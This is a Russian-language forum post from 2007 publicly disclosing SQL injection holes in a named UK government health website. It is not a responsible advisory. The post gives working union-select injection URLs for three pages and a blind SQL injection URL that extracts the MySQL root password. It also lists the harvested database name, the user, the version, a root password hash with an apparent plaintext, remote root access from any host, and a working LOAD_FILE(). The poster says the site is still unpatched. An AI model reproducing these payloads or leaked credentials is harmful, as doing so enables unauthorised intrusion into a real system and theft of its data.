
08.11.2007, 02:46
|
|
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
С нами:
10679366
Репутация:
361
|
|
www.wiredforhealth.gov.uk
Код:
http://www.wiredforhealth.gov.uk/cat.php?catid=-1+union+select+1,2,3/*
Код:
http://www.wiredforhealth.gov.uk/search.php?catid=-1+union+select+1,2,3/*
Код:
http://www.wiredforhealth.gov.uk/feedback.php?catid=-1+union+select+1,2,3/*
Теперь самое интересное.
Blind SQL-injecting
Код:
http://www.wiredforhealth.gov.uk/cat.php?catid=857+and+ascii(lower(substring((select+password+from+mysql.user+where+user='root'+limit+1),1,1)))<110
database_name = webstructure
user = root@localhost
version = 4.1.0-alpha-loh
root:758a0e1c73f5e6fa:garand01
host = % - разрешено с любого хоста
Предположительно, сервер работает под SunOS.
Работает LOAD_FILE().
Уже несколько месяцев прошло, админ до сих пор не прикрыл баги (вероятно, ему пофигу), поэтому и выкладываю.
|
|
|